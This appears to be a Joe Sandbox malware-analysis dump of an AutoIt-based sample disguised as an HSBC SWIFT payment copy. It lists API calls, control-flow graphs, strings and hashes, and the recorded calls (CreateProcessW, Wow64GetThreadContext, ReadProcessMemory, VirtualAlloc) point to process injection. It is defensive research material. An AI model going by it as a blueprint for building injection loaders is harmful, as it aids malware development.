                                                                                                                                • Instruction Fuzzy Hash: ACA14B72D0026DEACB14EBA0EC99AEEB778BF15304F440529F515B7191DF7C6A08CB60

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00740162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00740193
                                                                                                                                  • Part of subcall function 00740162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0074019B
                                                                                                                                  • Part of subcall function 00740162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007401A6
                                                                                                                                  • Part of subcall function 00740162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007401B1
                                                                                                                                  • Part of subcall function 00740162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007401B9
                                                                                                                                  • Part of subcall function 00740162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007401C1
                                                                                                                                  • Part of subcall function 007360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0072F930), ref: 00736154
                                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0072F9CD
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0072FA4A
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 007645C8
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                • String ID: <W~$\T~$%{$S~
                                                                                                                                • API String ID: 1986988660-2274366471
                                                                                                                                • Opcode ID: df1cbfc1a2c54bb6099d384cd72c6de0a0907d24f7859313ab2a300c3837a207
                                                                                                                                • Instruction ID: 9d5b57dbfbe4c4759b0b7ad166d5c321bad612a180be381d6fd31bf93cdac5a7
                                                                                                                                • Opcode Fuzzy Hash: df1cbfc1a2c54bb6099d384cd72c6de0a0907d24f7859313ab2a300c3837a207
                                                                                                                                • Instruction Fuzzy Hash: F98190B0903AC9CEC384DF69A984A597BE5AB4E30E750C13AD119CF2A2E77C4494CF19

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 985 1f825e0-1f8268e call 1f80000 988 1f82695-1f826bb call 1f834f0 CreateFileW 985->988 991 1f826bd 988->991 992 1f826c2-1f826d2 988->992 993 1f8280d-1f82811 991->993 999 1f826d9-1f826f3 VirtualAlloc 992->999 1000 1f826d4 992->1000 994 1f82853-1f82856 993->994 995 1f82813-1f82817 993->995 1001 1f82859-1f82860 994->1001 997 1f82819-1f8281c 995->997 998 1f82823-1f82827 995->998 997->998 1004 1f82829-1f82833 998->1004 1005 1f82837-1f8283b 998->1005 1006 1f826fa-1f82711 ReadFile 999->1006 1007 1f826f5 999->1007 1000->993 1002 1f82862-1f8286d 1001->1002 1003 1f828b5-1f828ca 1001->1003 1008 1f8286f 1002->1008 1009 1f82871-1f8287d 1002->1009 1010 1f828da-1f828e2 1003->1010 1011 1f828cc-1f828d7 VirtualFree 1003->1011 1004->1005 1012 1f8284b 1005->1012 1013 1f8283d-1f82847 1005->1013 1014 1f82718-1f82758 VirtualAlloc 1006->1014 1015 1f82713 1006->1015 1007->993 1008->1003 1018 1f8287f-1f8288f 1009->1018 1019 1f82891-1f8289d 1009->1019 1011->1010 1012->994 1013->1012 1016 1f8275a 1014->1016 1017 1f8275f-1f8277a call 1f83740 1014->1017 1015->993 1016->993 1025 1f82785-1f8278f 1017->1025 1021 1f828b3 1018->1021 1022 1f828aa-1f828b0 1019->1022 1023 1f8289f-1f828a8 1019->1023 1021->1001 1022->1021 1023->1021 1026 1f82791-1f827c0 call 1f83740 1025->1026 1027 1f827c2-1f827d6 call 1f83550 1025->1027 1026->1025 1033 1f827d8 1027->1033 1034 1f827da-1f827de 1027->1034 1033->993 1035 1f827ea-1f827ee 1034->1035 1036 1f827e0-1f827e4 CloseHandle 1034->1036 1037 1f827fe-1f82807 1035->1037 1038 1f827f0-1f827fb VirtualFree 1035->1038 1036->1035 1037->988 1037->993 1038->1037
                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01F826B1
                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01F828D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 204039940-0
                                                                                                                                • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                                • Instruction ID: 5c703ac219d6c1417ec89d5098493cf04f3af2f14c65ff1ba265b219c34b5819
                                                                                                                                • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                                • Instruction Fuzzy Hash: 61A10775E00209EBDF14EFA4C994BAEBBB5FF48704F208159E501BB281D776AA41CF94

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1116 7239d5-723a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00723A03
                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00723A24
                                                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 00723A38
                                                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 00723A41
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                • Opcode ID: 40fd014b47f25c876dd1a030e2ae780d4c36d07d88804c6b548d296911c72df9
                                                                                                                                • Instruction ID: 88ebba3a5f6bab4ef9a729d7890f607c133220f176454f146e27a3089afcb376
                                                                                                                                • Opcode Fuzzy Hash: 40fd014b47f25c876dd1a030e2ae780d4c36d07d88804c6b548d296911c72df9
                                                                                                                                • Instruction Fuzzy Hash: A0F030B05026D47EEA3057536C88E773E7DE7CBF64B008129FB00A6171C1691840CA78

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1117 1f823b0-1f824d6 call 1f80000 call 1f822a0 CreateFileW 1124 1f824d8 1117->1124 1125 1f824dd-1f824ed 1117->1125 1126 1f8258d-1f82592 1124->1126 1128 1f824ef 1125->1128 1129 1f824f4-1f8250e VirtualAlloc 1125->1129 1128->1126 1130 1f82510 1129->1130 1131 1f82512-1f82529 ReadFile 1129->1131 1130->1126 1132 1f8252b 1131->1132 1133 1f8252d-1f82567 call 1f822e0 call 1f812a0 1131->1133 1132->1126 1138 1f82569-1f8257e call 1f82330 1133->1138 1139 1f82583-1f8258b ExitProcess 1133->1139 1138->1139 1139->1126
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 01F822A0: Sleep.KERNELBASE(000001F4), ref: 01F822B1
                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F824CC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                • String ID: 5JQ384JD2E5FW2SXN
                                                                                                                                • API String ID: 2694422964-3359981271
                                                                                                                                • Opcode ID: 05bd7ba4e3466ef88773a4d3c5241edd257731cc0c176f0127774519a4b31b12
                                                                                                                                • Instruction ID: acfd420aff96f789ed88653e7c2fa07055618a783149e85bbe1858bb004978d7
                                                                                                                                • Opcode Fuzzy Hash: 05bd7ba4e3466ef88773a4d3c5241edd257731cc0c176f0127774519a4b31b12
                                                                                                                                • Instruction Fuzzy Hash: 5D519031D04249EBEF11EBB4CC55BEEBBB9AF54300F004199E209BB2C1D6BA1B45CB65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1141 72407c-724092 1142 724098-7240ad call 727a16 1141->1142 1143 72416f-724173 1141->1143 1146 7240b3-7240d3 call 727bcc 1142->1146 1147 75d3c8-75d3d7 LoadStringW 1142->1147 1150 75d3e2-75d3fa call 727b2e call 726fe3 1146->1150 1151 7240d9-7240dd 1146->1151 1147->1150 1160 7240ed-72416a call 742de0 call 72454e call 742dbc Shell_NotifyIconW call 725904 1150->1160 1163 75d400-75d41e call 727cab call 726fe3 call 727cab 1150->1163 1153 7240e3-7240e8 call 727b2e 1151->1153 1154 724174-72417d call 728047 1151->1154 1153->1160 1154->1160 1160->1143 1163->1160
                                                                                                                                APIs
                                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0075D3D7
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                • _memset.LIBCMT ref: 007240FC
                                                                                                                                • _wcscpy.LIBCMT ref: 00724150
                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00724160
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                • String ID: Line:
                                                                                                                                • API String ID: 3942752672-1585850449
                                                                                                                                • Opcode ID: df4e698a5b55bb6376cb228a97a625928a53ff2c36fad027ae6373bc5c7b27fd
                                                                                                                                • Instruction ID: 593434560fbc666c89ce5a0d8fe4920081ffc6386421f4bb516e7f79822ac748
                                                                                                                                • Opcode Fuzzy Hash: df4e698a5b55bb6376cb228a97a625928a53ff2c36fad027ae6373bc5c7b27fd
                                                                                                                                • Instruction Fuzzy Hash: 4531D2B1009358ABD734EB60EC4AFDB77DCAF44304F10891EF685860A1DB7CA648C796
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724E0F
                                                                                                                                • _free.LIBCMT ref: 0075E263
                                                                                                                                • _free.LIBCMT ref: 0075E2AA
                                                                                                                                  • Part of subcall function 00726A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00726BAD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                • API String ID: 2861923089-1757145024
                                                                                                                                • Opcode ID: a88e79036b4c2d125cccbbf5101a417849738e65d94de8f97efe4e3caccd97bb
                                                                                                                                • Instruction ID: 751b784b568cc8db3629cda566bae38c741bc02b3223d3b7b34282b057d93ca7
                                                                                                                                • Opcode Fuzzy Hash: a88e79036b4c2d125cccbbf5101a417849738e65d94de8f97efe4e3caccd97bb
                                                                                                                                • Instruction Fuzzy Hash: C3918271900229EFCF08EFA4DC859EDB7B4FF05311F10442AF815AB2A1DBB8AA55CB50
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007235A1,SwapMouseButtons,00000004,?), ref: 007235D4
                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007235A1,SwapMouseButtons,00000004,?,?,?,?,00722754), ref: 007235F5
                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,007235A1,SwapMouseButtons,00000004,?,?,?,?,00722754), ref: 00723617
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                                • Opcode ID: 0639672ab7716e77ea82fdbe614eeb8a7d2512d2448094a50f7f40b7d6a50c33
                                                                                                                                • Instruction ID: 063cf89c087ce0d4142daec0136543b53aae46fc506ce0df90e7d426a95571d7
                                                                                                                                • Opcode Fuzzy Hash: 0639672ab7716e77ea82fdbe614eeb8a7d2512d2448094a50f7f40b7d6a50c33
                                                                                                                                • Instruction Fuzzy Hash: B8115771610228BFDB208FA4EC80EAFBBBCEF45740F019469F805D7210E2799F409BA4
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01F81A5B
                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F81AF1
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F81B13
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2438371351-0
                                                                                                                                • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                                                • Instruction ID: 80710c93f89615058edd2eb08cc11f25bf558e5548315e4de3e4b1b0c080325f
                                                                                                                                • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                                                • Instruction Fuzzy Hash: 52620A30A14658DBEB24DFA4C850BDEB772EF58700F1091A9D20DEB390E7769E81CB59
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724EE5: _fseek.LIBCMT ref: 00724EFD
                                                                                                                                  • Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789824
                                                                                                                                  • Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789837
                                                                                                                                • _free.LIBCMT ref: 007896A2
                                                                                                                                • _free.LIBCMT ref: 007896A9
                                                                                                                                • _free.LIBCMT ref: 00789714
                                                                                                                                  • Part of subcall function 00742D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00749A24), ref: 00742D69
                                                                                                                                  • Part of subcall function 00742D55: GetLastError.KERNEL32(00000000,?,00749A24), ref: 00742D7B
                                                                                                                                • _free.LIBCMT ref: 0078971C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1552873950-0
                                                                                                                                • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                                • Instruction ID: 535139af71ab394b71e17d03dfc64c6fab09587e937e9a458ae008e27d733c9e
                                                                                                                                • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                                • Instruction Fuzzy Hash: E85160B1E04258EFDF259F64DC85AAEBB79EF48300F14049EF209A3241DB755A91CF58
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2782032738-0
                                                                                                                                • Opcode ID: 4d52eff99123aac4a06db8725133cf03f23f84e976aa4ad933b544abe1f9a118
                                                                                                                                • Instruction ID: 7cdae8fd26cdfe7cce9a9810afe97b253cd47cc0e7788747fef50976615ac312
                                                                                                                                • Opcode Fuzzy Hash: 4d52eff99123aac4a06db8725133cf03f23f84e976aa4ad933b544abe1f9a118
                                                                                                                                • Instruction Fuzzy Hash: 8441D374B00746EFDB19CF69C884AAE77A9EF42360B24813DE815C7640EB78DD42AB40
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID: AU3!P/{$EA06
                                                                                                                                • API String ID: 4104443479-1001243050
                                                                                                                                • Opcode ID: 4901804f5ca37af24688f7e69c9d25f0145db5d9da132401c4d9ffc44655cc57
                                                                                                                                • Instruction ID: 20a79b4337c7cd824d7f07bac6685b942785be9c8a3b58a8d0f5c0538edc6460
                                                                                                                                • Opcode Fuzzy Hash: 4901804f5ca37af24688f7e69c9d25f0145db5d9da132401c4d9ffc44655cc57
                                                                                                                                • Instruction Fuzzy Hash: 00417C31B04178ABDF229B64FC557BE7FA2DB45300F684464EE82DB287D63C9D8483A1
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 0075EA39
                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0075EA83
                                                                                                                                  • Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770
                                                                                                                                  • Part of subcall function 00740791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007407B0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                • String ID: X
                                                                                                                                • API String ID: 3777226403-3081909835
                                                                                                                                • Opcode ID: 69ecf77bc62dfa2de3a7a36565443ceaa17c224e93930b0a6067dc0c8c55c872
                                                                                                                                • Instruction ID: 69c9f1e60116d2b202c5eaef527cb4993c2804b27fab458de2d274ebc39ae620
                                                                                                                                • Opcode Fuzzy Hash: 69ecf77bc62dfa2de3a7a36565443ceaa17c224e93930b0a6067dc0c8c55c872
                                                                                                                                • Instruction Fuzzy Hash: E021C671A00258DBCB459F94DC49BEE7BF8AF49315F00801AE908AB341DBFC5989CF91
                                                                                                                                APIs
                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 007898F8
                                                                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0078990F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                                • String ID: aut
                                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                                • Opcode ID: 2af48e45bab6930c001aa8f26aad93d27e7216c1c885e42a67894da0cae330c6
                                                                                                                                • Instruction ID: 0c7e96f6213f52adb908d69c3cce80802c3c4684fa24937fd516658556938db1
                                                                                                                                • Opcode Fuzzy Hash: 2af48e45bab6930c001aa8f26aad93d27e7216c1c885e42a67894da0cae330c6
                                                                                                                                • Instruction Fuzzy Hash: 07D05E7954030DABDB50ABE0DC0EFDA773CE744701F0042B1FA94911E1EAB895988B95
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5adcb0f354c6965c33a8c652d2e7f903002fdb0d1fc521810eb4768cbb9137d4
                                                                                                                                • Instruction ID: 4635ebe730a25b00aba89d3418f0a61d3fcaf9e2cf2716177b05b574d4989af0
